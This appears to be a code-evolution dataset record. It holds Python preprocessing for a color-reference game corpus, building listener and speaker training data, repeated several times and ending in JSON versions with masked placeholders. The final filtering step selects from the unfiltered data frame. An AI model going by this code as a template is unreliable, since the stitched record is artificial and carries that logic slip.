le = LabelEncoder()
df_final['contents'] = le.fit_transform(df_final['contents'])
return df_final, le
def get_meaning_matrix(df):
df['colors'] = list(zip(df['clickColH'], df['clickColS'], df['clickColL']))
df['colors'] = df['colors'].apply(lambda x: str(x))
colors_le = LabelEncoder()
df['colors'] = colors_le.fit_transform(df['colors'])
print('length colors and contents', len(df['colors']), len(df['contents']))
print('set colors and contents', len(set(df['colors'])), len(set(df[
'contents'])))
meaning_mat = pd.crosstab(df['colors'], df['contents'])
meaning_mat = np.array(meaning_mat)
for i in range(len(meaning_mat[:, 0])):
if sum(meaning_mat[i, :]) == 0:
print('meaning mat is 0 for this row: ', i)
for j in range(len(meaning_mat[0, :])):
if meaning_mat[i, j] == 0:
print('meaning mat is 0 at: ', i, j, ' !!!')
return meaning_mat, colors_le
def get_pragmatic_listener_testing_data(df):
output = []
all_utt = list(set(list(df['contents'])))
desc_to_idx = {u: i for i, u in enumerate(all_utt)}
for _, row in tqdm(df.iterrows(), total=len(df)):
utt = torch.tensor(row['contents']).to(device)
correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],
dtype=torch.float32)
alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']],
dtype=torch.float32)
alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']],
dtype=torch.float32)
colors = correct, alt1, alt2
idxs = np.arange(3)
np.random.shuffle(idxs)
colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]],
colors[idxs[2]]]).to(device)
correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device)
output.append((correct_idx, colors_shuff, utt))
return output, all_utt, desc_to_idx
def get_literal_listener_training_data(df):
output = []
all_utt = df['contents']
idx_to_desc = {i: u for i, u in enumerate(all_utt)}
for _, row in tqdm(df.iterrows(), total=len(df)):
utt = torch.tensor(row['contents']).to(device)
correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],
dtype=torch.float32)
alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']],
dtype=torch.float32)
alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']],
dtype=torch.float32)
colors = correct, alt1, alt2
idxs = np.arange(3)
np.random.shuffle(idxs)
colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]],
colors[idxs[2]]]).to(device)
correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device)
output.append((correct_idx, colors_shuff, utt))
return output
def get_literal_speaker_training_data(df):
output = []
for _, row in tqdm(df.iterrows(), total=len(df)):
utt = torch.tensor(row['contents'], dtype=torch.long).to(device)
color = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],
dtype=torch.float32).to(device)
output.append([color, utt])
return output
<|reserved_special_token_1|>
from collections import Counter
import pandas as pd
import string
from collections import namedtuple, defaultdict
import csv
import sys
import torch
import numpy as np
from sklearn.preprocessing import LabelEncoder
from scipy.sparse import coo_matrix
from tqdm import tqdm
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
device = 'cpu'
def get_data():
df = pd.read_csv('./data/filteredCorpus.csv')
df_filt = df[df['outcome'] == True]
df_filt = df_filt[df_filt['role'] == 'speaker']
df_filt = df_filt[df_filt['source'] == 'human']
utt = df_filt['contents']
utt_filt = [u.lower() for u in utt if len(u.split()) == 1]
utt_filt = [u.translate(str.maketrans('', '', string.punctuation)) for
u in utt_filt]
utt_final = list((Counter(utt_filt) - Counter(set(utt_filt))).keys())
df_filt['contents'] = df_filt['contents'].apply(lambda x: x.lower())
df_filt['contents'] = df_filt['contents'].apply(lambda x: x.translate(
str.maketrans('', '', string.punctuation)))
df_final = df.loc[df['contents'].isin(utt_final)]
le = LabelEncoder()
df_final['contents'] = le.fit_transform(df_final['contents'])
return df_final, le
def get_meaning_matrix(df):
df['colors'] = list(zip(df['clickColH'], df['clickColS'], df['clickColL']))
df['colors'] = df['colors'].apply(lambda x: str(x))
colors_le = LabelEncoder()
df['colors'] = colors_le.fit_transform(df['colors'])
print('length colors and contents', len(df['colors']), len(df['contents']))
print('set colors and contents', len(set(df['colors'])), len(set(df[
'contents'])))
meaning_mat = pd.crosstab(df['colors'], df['contents'])
meaning_mat = np.array(meaning_mat)
for i in range(len(meaning_mat[:, 0])):
if sum(meaning_mat[i, :]) == 0:
print('meaning mat is 0 for this row: ', i)
for j in range(len(meaning_mat[0, :])):
if meaning_mat[i, j] == 0:
print('meaning mat is 0 at: ', i, j, ' !!!')
return meaning_mat, colors_le
def get_pragmatic_listener_testing_data(df):
output = []
all_utt = list(set(list(df['contents'])))
desc_to_idx = {u: i for i, u in enumerate(all_utt)}
for _, row in tqdm(df.iterrows(), total=len(df)):
utt = torch.tensor(row['contents']).to(device)
correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],
dtype=torch.float32)
alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']],
dtype=torch.float32)
alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']],
dtype=torch.float32)
colors = correct, alt1, alt2
idxs = np.arange(3)
np.random.shuffle(idxs)
colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]],
colors[idxs[2]]]).to(device)
correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device)
output.append((correct_idx, colors_shuff, utt))
return output, all_utt, desc_to_idx
def get_literal_listener_training_data(df):
output = []
all_utt = df['contents']
idx_to_desc = {i: u for i, u in enumerate(all_utt)}
for _, row in tqdm(df.iterrows(), total=len(df)):
utt = torch.tensor(row['contents']).to(device)
correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],
dtype=torch.float32)
alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']],
dtype=torch.float32)
alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']],
dtype=torch.float32)
colors = correct, alt1, alt2
idxs = np.arange(3)
np.random.shuffle(idxs)
colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]],
colors[idxs[2]]]).to(device)
correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device)
output.append((correct_idx, colors_shuff, utt))
return output
def get_literal_speaker_training_data(df):
output = []
for _, row in tqdm(df.iterrows(), total=len(df)):
utt = torch.tensor(row['contents'], dtype=torch.long).to(device)
color = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],
dtype=torch.float32).to(device)
output.append([color, utt])
return output
<|reserved_special_token_1|>
from collections import Counter
import pandas as pd
import string
from collections import namedtuple, defaultdict
import csv
import sys
import torch
import numpy as np
from sklearn.preprocessing import LabelEncoder
from scipy.sparse import coo_matrix
from tqdm import tqdm
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
device = 'cpu'
def get_data():
df = pd.read_csv("./data/filteredCorpus.csv")
df_filt = df[df['outcome']==True] # use only successful games
df_filt = df_filt[df_filt['role']=='speaker'] # use speaker utterances
df_filt = df_filt[df_filt['source']=='human'] # use speaker utterances
# making a list of utterances that we want to use, so we can take these rows from df_filt
utt = df_filt['contents']
utt_filt = [u.lower() for u in utt if len(u.split()) == 1] # only use one word utterances
utt_filt = [u.translate(str.maketrans('', '', string.punctuation)) for u in utt_filt] # remove punctuation
utt_final = list((Counter(utt_filt) - Counter(set(utt_filt))).keys()) # use utterances that appear more than once
# df_filt = df_filt[df_filt['numCleanWords'] == 1]
df_filt['contents'] = df_filt['contents'].apply(lambda x: x.lower())
df_filt['contents'] = df_filt['contents'].apply(lambda x: x.translate(str.maketrans('', '', string.punctuation)))# filter to take out punctuation
df_final = df.loc[df['contents'].isin(utt_final)] # this is the dataset of all the games that we want to use
le = LabelEncoder()
df_final['contents'] = le.fit_transform(df_final['contents'])
return df_final, le
def get_meaning_matrix(df):
df['colors'] = list(zip(df['clickColH'], df['clickColS'], df['clickColL']))
df['colors'] = df['colors'].apply(lambda x: str(x))
colors_le = LabelEncoder()
df['colors'] = colors_le.fit_transform(df['colors']) # 100 x 100 (test data)
print("length colors and contents", len(df['colors']), len(df['contents']))
print("set colors and contents", len(set(df['colors'])), len(set(df['contents'])))
meaning_mat = pd.crosstab(df['colors'], df['contents']) # rows are colors, columns are utterances
# row numbers and column numbers correspond to labels from colors_le and le (utterances) from get_data()
meaning_mat = np.array(meaning_mat) # a num_color x num_utterances matrix
for i in range(len(meaning_mat[:,0])):
if sum(meaning_mat[i,:]) == 0:
print("meaning mat is 0 for this row: ", i)
for j in range(len(meaning_mat[0,:])):
if meaning_mat[i,j] == 0:
print("meaning mat is 0 at: ", i,j," !!!")
return meaning_mat, colors_le
# Literal listener data function
def get_pragmatic_listener_testing_data(df):
output = []
all_utt = list(set(list(df['contents'])))
desc_to_idx = {u: i for i,u in enumerate(all_utt)}
for _, row in tqdm(df.iterrows(), total=len(df)):
utt = torch.tensor(row['contents']).to(device)
correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']], dtype=torch.float32)
alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']], dtype=torch.float32)
alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']], dtype=torch.float32)
colors = (correct, alt1, alt2)
# idxs = random.choice([0,1,2]) # randomly permute colors
idxs = np.arange(3)
np.random.shuffle(idxs)
colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]], colors[idxs[2]]]).to(device)
correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device) # index where correct color goes
output.append((correct_idx, colors_shuff, utt))
return output, all_utt, desc_to_idx # [correct_referent_idx, list_of_three_referents, descriptor_idx] desc_to_idx idx_to_desc
# return all_utt, idx_to_desc # [correct_referent_idx, list_of_three_referents, descriptor_idx] desc_to_idx idx_to_desc
def get_literal_listener_training_data(df):
output = []
all_utt = df['contents']
idx_to_desc = {i: u for i,u in enumerate(all_utt)}
for _, row in tqdm(df.iterrows(), total=len(df)):
utt = torch.tensor(row['contents']).to(device)
correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']], dtype=torch.float32)
alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']], dtype=torch.float32)
alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']], dtype=torch.float32)
colors = (correct, alt1, alt2)
# idxs = random.choice([0,1,2]) # randomly permute colors
idxs = np.arange(3)
np.random.shuffle(idxs)
colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]], colors[idxs[2]]]).to(device)
correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device) # index where correct color goes
output.append((correct_idx, colors_shuff, utt))
return output#, all_utt, idx_to_desc # [correct_referent_idx, list_of_three_referents, descriptor_idx] desc_to_idx idx_to_desc
# Literal Speaker data function - hi r u ok
def get_literal_speaker_training_data(df):
output = []
for _, row in tqdm(df.iterrows(), total=len(df)):
utt = torch.tensor(row['contents'], dtype=torch.long).to(device)
color = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']], dtype=torch.float32).to(device)
output.append([color, utt])
return output # [referent, utterance_idx]
|
flexible
|
{
"blob_id": "613b060ee50b49417342cfa70b36f77d112dcc58",
"index": 2951,
"step-1": "<mask token>\n\n\ndef get_data():\n df = pd.read_csv('./data/filteredCorpus.csv')\n df_filt = df[df['outcome'] == True]\n df_filt = df_filt[df_filt['role'] == 'speaker']\n df_filt = df_filt[df_filt['source'] == 'human']\n utt = df_filt['contents']\n utt_filt = [u.lower() for u in utt if len(u.split()) == 1]\n utt_filt = [u.translate(str.maketrans('', '', string.punctuation)) for\n u in utt_filt]\n utt_final = list((Counter(utt_filt) - Counter(set(utt_filt))).keys())\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.lower())\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.translate(\n str.maketrans('', '', string.punctuation)))\n df_final = df.loc[df['contents'].isin(utt_final)]\n le = LabelEncoder()\n df_final['contents'] = le.fit_transform(df_final['contents'])\n return df_final, le\n\n\ndef get_meaning_matrix(df):\n df['colors'] = list(zip(df['clickColH'], df['clickColS'], df['clickColL']))\n df['colors'] = df['colors'].apply(lambda x: str(x))\n colors_le = LabelEncoder()\n df['colors'] = colors_le.fit_transform(df['colors'])\n print('length colors and contents', len(df['colors']), len(df['contents']))\n print('set colors and contents', len(set(df['colors'])), len(set(df[\n 'contents'])))\n meaning_mat = pd.crosstab(df['colors'], df['contents'])\n meaning_mat = np.array(meaning_mat)\n for i in range(len(meaning_mat[:, 0])):\n if sum(meaning_mat[i, :]) == 0:\n print('meaning mat is 0 for this row: ', i)\n for j in range(len(meaning_mat[0, :])):\n if meaning_mat[i, j] == 0:\n print('meaning mat is 0 at: ', i, j, ' !!!')\n return meaning_mat, colors_le\n\n\n<mask token>\n\n\ndef get_literal_listener_training_data(df):\n output = []\n all_utt = df['contents']\n idx_to_desc = {i: u for i, u in enumerate(all_utt)}\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents']).to(device)\n correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32)\n alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']],\n dtype=torch.float32)\n alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']],\n dtype=torch.float32)\n colors = correct, alt1, alt2\n idxs = np.arange(3)\n np.random.shuffle(idxs)\n colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]],\n colors[idxs[2]]]).to(device)\n correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device)\n output.append((correct_idx, colors_shuff, utt))\n return output\n\n\ndef get_literal_speaker_training_data(df):\n output = []\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents'], dtype=torch.long).to(device)\n color = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32).to(device)\n output.append([color, utt])\n return output\n",
"step-2": "<mask token>\n\n\ndef get_data():\n df = pd.read_csv('./data/filteredCorpus.csv')\n df_filt = df[df['outcome'] == True]\n df_filt = df_filt[df_filt['role'] == 'speaker']\n df_filt = df_filt[df_filt['source'] == 'human']\n utt = df_filt['contents']\n utt_filt = [u.lower() for u in utt if len(u.split()) == 1]\n utt_filt = [u.translate(str.maketrans('', '', string.punctuation)) for\n u in utt_filt]\n utt_final = list((Counter(utt_filt) - Counter(set(utt_filt))).keys())\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.lower())\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.translate(\n str.maketrans('', '', string.punctuation)))\n df_final = df.loc[df['contents'].isin(utt_final)]\n le = LabelEncoder()\n df_final['contents'] = le.fit_transform(df_final['contents'])\n return df_final, le\n\n\ndef get_meaning_matrix(df):\n df['colors'] = list(zip(df['clickColH'], df['clickColS'], df['clickColL']))\n df['colors'] = df['colors'].apply(lambda x: str(x))\n colors_le = LabelEncoder()\n df['colors'] = colors_le.fit_transform(df['colors'])\n print('length colors and contents', len(df['colors']), len(df['contents']))\n print('set colors and contents', len(set(df['colors'])), len(set(df[\n 'contents'])))\n meaning_mat = pd.crosstab(df['colors'], df['contents'])\n meaning_mat = np.array(meaning_mat)\n for i in range(len(meaning_mat[:, 0])):\n if sum(meaning_mat[i, :]) == 0:\n print('meaning mat is 0 for this row: ', i)\n for j in range(len(meaning_mat[0, :])):\n if meaning_mat[i, j] == 0:\n print('meaning mat is 0 at: ', i, j, ' !!!')\n return meaning_mat, colors_le\n\n\ndef get_pragmatic_listener_testing_data(df):\n output = []\n all_utt = list(set(list(df['contents'])))\n desc_to_idx = {u: i for i, u in enumerate(all_utt)}\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents']).to(device)\n correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32)\n alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']],\n dtype=torch.float32)\n alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']],\n dtype=torch.float32)\n colors = correct, alt1, alt2\n idxs = np.arange(3)\n np.random.shuffle(idxs)\n colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]],\n colors[idxs[2]]]).to(device)\n correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device)\n output.append((correct_idx, colors_shuff, utt))\n return output, all_utt, desc_to_idx\n\n\ndef get_literal_listener_training_data(df):\n output = []\n all_utt = df['contents']\n idx_to_desc = {i: u for i, u in enumerate(all_utt)}\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents']).to(device)\n correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32)\n alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']],\n dtype=torch.float32)\n alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']],\n dtype=torch.float32)\n colors = correct, alt1, alt2\n idxs = np.arange(3)\n np.random.shuffle(idxs)\n colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]],\n colors[idxs[2]]]).to(device)\n correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device)\n output.append((correct_idx, colors_shuff, utt))\n return output\n\n\ndef get_literal_speaker_training_data(df):\n output = []\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents'], dtype=torch.long).to(device)\n color = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32).to(device)\n output.append([color, utt])\n return output\n",
"step-3": "<mask token>\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\ndevice = 'cpu'\n\n\ndef get_data():\n df = pd.read_csv('./data/filteredCorpus.csv')\n df_filt = df[df['outcome'] == True]\n df_filt = df_filt[df_filt['role'] == 'speaker']\n df_filt = df_filt[df_filt['source'] == 'human']\n utt = df_filt['contents']\n utt_filt = [u.lower() for u in utt if len(u.split()) == 1]\n utt_filt = [u.translate(str.maketrans('', '', string.punctuation)) for\n u in utt_filt]\n utt_final = list((Counter(utt_filt) - Counter(set(utt_filt))).keys())\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.lower())\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.translate(\n str.maketrans('', '', string.punctuation)))\n df_final = df.loc[df['contents'].isin(utt_final)]\n le = LabelEncoder()\n df_final['contents'] = le.fit_transform(df_final['contents'])\n return df_final, le\n\n\ndef get_meaning_matrix(df):\n df['colors'] = list(zip(df['clickColH'], df['clickColS'], df['clickColL']))\n df['colors'] = df['colors'].apply(lambda x: str(x))\n colors_le = LabelEncoder()\n df['colors'] = colors_le.fit_transform(df['colors'])\n print('length colors and contents', len(df['colors']), len(df['contents']))\n print('set colors and contents', len(set(df['colors'])), len(set(df[\n 'contents'])))\n meaning_mat = pd.crosstab(df['colors'], df['contents'])\n meaning_mat = np.array(meaning_mat)\n for i in range(len(meaning_mat[:, 0])):\n if sum(meaning_mat[i, :]) == 0:\n print('meaning mat is 0 for this row: ', i)\n for j in range(len(meaning_mat[0, :])):\n if meaning_mat[i, j] == 0:\n print('meaning mat is 0 at: ', i, j, ' !!!')\n return meaning_mat, colors_le\n\n\ndef get_pragmatic_listener_testing_data(df):\n output = []\n all_utt = list(set(list(df['contents'])))\n desc_to_idx = {u: i for i, u in enumerate(all_utt)}\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents']).to(device)\n correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32)\n alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']],\n dtype=torch.float32)\n alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']],\n dtype=torch.float32)\n colors = correct, alt1, alt2\n idxs = np.arange(3)\n np.random.shuffle(idxs)\n colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]],\n colors[idxs[2]]]).to(device)\n correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device)\n output.append((correct_idx, colors_shuff, utt))\n return output, all_utt, desc_to_idx\n\n\ndef get_literal_listener_training_data(df):\n output = []\n all_utt = df['contents']\n idx_to_desc = {i: u for i, u in enumerate(all_utt)}\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents']).to(device)\n correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32)\n alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']],\n dtype=torch.float32)\n alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']],\n dtype=torch.float32)\n colors = correct, alt1, alt2\n idxs = np.arange(3)\n np.random.shuffle(idxs)\n colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]],\n colors[idxs[2]]]).to(device)\n correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device)\n output.append((correct_idx, colors_shuff, utt))\n return output\n\n\ndef get_literal_speaker_training_data(df):\n output = []\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents'], dtype=torch.long).to(device)\n color = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32).to(device)\n output.append([color, utt])\n return output\n",
"step-4": "from collections import Counter\nimport pandas as pd\nimport string\nfrom collections import namedtuple, defaultdict\nimport csv\nimport sys\nimport torch\nimport numpy as np\nfrom sklearn.preprocessing import LabelEncoder\nfrom scipy.sparse import coo_matrix\nfrom tqdm import tqdm\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\ndevice = 'cpu'\n\n\ndef get_data():\n df = pd.read_csv('./data/filteredCorpus.csv')\n df_filt = df[df['outcome'] == True]\n df_filt = df_filt[df_filt['role'] == 'speaker']\n df_filt = df_filt[df_filt['source'] == 'human']\n utt = df_filt['contents']\n utt_filt = [u.lower() for u in utt if len(u.split()) == 1]\n utt_filt = [u.translate(str.maketrans('', '', string.punctuation)) for\n u in utt_filt]\n utt_final = list((Counter(utt_filt) - Counter(set(utt_filt))).keys())\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.lower())\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.translate(\n str.maketrans('', '', string.punctuation)))\n df_final = df.loc[df['contents'].isin(utt_final)]\n le = LabelEncoder()\n df_final['contents'] = le.fit_transform(df_final['contents'])\n return df_final, le\n\n\ndef get_meaning_matrix(df):\n df['colors'] = list(zip(df['clickColH'], df['clickColS'], df['clickColL']))\n df['colors'] = df['colors'].apply(lambda x: str(x))\n colors_le = LabelEncoder()\n df['colors'] = colors_le.fit_transform(df['colors'])\n print('length colors and contents', len(df['colors']), len(df['contents']))\n print('set colors and contents', len(set(df['colors'])), len(set(df[\n 'contents'])))\n meaning_mat = pd.crosstab(df['colors'], df['contents'])\n meaning_mat = np.array(meaning_mat)\n for i in range(len(meaning_mat[:, 0])):\n if sum(meaning_mat[i, :]) == 0:\n print('meaning mat is 0 for this row: ', i)\n for j in range(len(meaning_mat[0, :])):\n if meaning_mat[i, j] == 0:\n print('meaning mat is 0 at: ', i, j, ' !!!')\n return meaning_mat, colors_le\n\n\ndef get_pragmatic_listener_testing_data(df):\n output = []\n all_utt = list(set(list(df['contents'])))\n desc_to_idx = {u: i for i, u in enumerate(all_utt)}\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents']).to(device)\n correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32)\n alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']],\n dtype=torch.float32)\n alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']],\n dtype=torch.float32)\n colors = correct, alt1, alt2\n idxs = np.arange(3)\n np.random.shuffle(idxs)\n colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]],\n colors[idxs[2]]]).to(device)\n correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device)\n output.append((correct_idx, colors_shuff, utt))\n return output, all_utt, desc_to_idx\n\n\ndef get_literal_listener_training_data(df):\n output = []\n all_utt = df['contents']\n idx_to_desc = {i: u for i, u in enumerate(all_utt)}\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents']).to(device)\n correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32)\n alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']],\n dtype=torch.float32)\n alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']],\n dtype=torch.float32)\n colors = correct, alt1, alt2\n idxs = np.arange(3)\n np.random.shuffle(idxs)\n colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]],\n colors[idxs[2]]]).to(device)\n correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device)\n output.append((correct_idx, colors_shuff, utt))\n return output\n\n\ndef get_literal_speaker_training_data(df):\n output = []\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents'], dtype=torch.long).to(device)\n color = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32).to(device)\n output.append([color, utt])\n return output\n",
"step-5": "from collections import Counter\nimport pandas as pd\nimport string\nfrom collections import namedtuple, defaultdict\nimport csv\nimport sys\nimport torch\nimport numpy as np\nfrom sklearn.preprocessing import LabelEncoder\nfrom scipy.sparse import coo_matrix\nfrom tqdm import tqdm\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\ndevice = 'cpu'\n\ndef get_data():\n df = pd.read_csv(\"./data/filteredCorpus.csv\")\n df_filt = df[df['outcome']==True] # use only successful games\n df_filt = df_filt[df_filt['role']=='speaker'] # use speaker utterances\n df_filt = df_filt[df_filt['source']=='human'] # use speaker utterances\n\n # making a list of utterances that we want to use, so we can take these rows from df_filt\n utt = df_filt['contents']\n utt_filt = [u.lower() for u in utt if len(u.split()) == 1] # only use one word utterances\n utt_filt = [u.translate(str.maketrans('', '', string.punctuation)) for u in utt_filt] # remove punctuation\n utt_final = list((Counter(utt_filt) - Counter(set(utt_filt))).keys()) # use utterances that appear more than once\n\n # df_filt = df_filt[df_filt['numCleanWords'] == 1]\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.lower())\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.translate(str.maketrans('', '', string.punctuation)))# filter to take out punctuation\n df_final = df.loc[df['contents'].isin(utt_final)] # this is the dataset of all the games that we want to use\n\n le = LabelEncoder()\n df_final['contents'] = le.fit_transform(df_final['contents'])\n\n return df_final, le\n\n\n\ndef get_meaning_matrix(df):\n df['colors'] = list(zip(df['clickColH'], df['clickColS'], df['clickColL']))\n df['colors'] = df['colors'].apply(lambda x: str(x))\n colors_le = LabelEncoder()\n df['colors'] = colors_le.fit_transform(df['colors']) # 100 x 100 (test data)\n print(\"length colors and contents\", len(df['colors']), len(df['contents']))\n print(\"set colors and contents\", len(set(df['colors'])), len(set(df['contents'])))\n meaning_mat = pd.crosstab(df['colors'], df['contents']) # rows are colors, columns are utterances\n # row numbers and column numbers correspond to labels from colors_le and le (utterances) from get_data()\n meaning_mat = np.array(meaning_mat) # a num_color x num_utterances matrix\n\n for i in range(len(meaning_mat[:,0])):\n if sum(meaning_mat[i,:]) == 0:\n print(\"meaning mat is 0 for this row: \", i)\n for j in range(len(meaning_mat[0,:])):\n if meaning_mat[i,j] == 0:\n print(\"meaning mat is 0 at: \", i,j,\" !!!\")\n return meaning_mat, colors_le\n\n\n\n\n# Literal listener data function\n\n\n\n\ndef get_pragmatic_listener_testing_data(df):\n output = []\n all_utt = list(set(list(df['contents'])))\n desc_to_idx = {u: i for i,u in enumerate(all_utt)}\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents']).to(device)\n correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']], dtype=torch.float32)\n alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']], dtype=torch.float32)\n alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']], dtype=torch.float32)\n colors = (correct, alt1, alt2)\n # idxs = random.choice([0,1,2]) # randomly permute colors\n idxs = np.arange(3)\n np.random.shuffle(idxs)\n colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]], colors[idxs[2]]]).to(device)\n correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device) # index where correct color goes\n output.append((correct_idx, colors_shuff, utt))\n return output, all_utt, desc_to_idx # [correct_referent_idx, list_of_three_referents, descriptor_idx] desc_to_idx idx_to_desc\n\n # return all_utt, idx_to_desc # [correct_referent_idx, list_of_three_referents, descriptor_idx] desc_to_idx idx_to_desc\n\n\n\n\ndef get_literal_listener_training_data(df):\n output = []\n all_utt = df['contents']\n idx_to_desc = {i: u for i,u in enumerate(all_utt)}\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents']).to(device)\n correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']], dtype=torch.float32)\n alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']], dtype=torch.float32)\n alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']], dtype=torch.float32)\n colors = (correct, alt1, alt2)\n # idxs = random.choice([0,1,2]) # randomly permute colors\n idxs = np.arange(3)\n np.random.shuffle(idxs)\n colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]], colors[idxs[2]]]).to(device)\n correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device) # index where correct color goes\n output.append((correct_idx, colors_shuff, utt))\n return output#, all_utt, idx_to_desc # [correct_referent_idx, list_of_three_referents, descriptor_idx] desc_to_idx 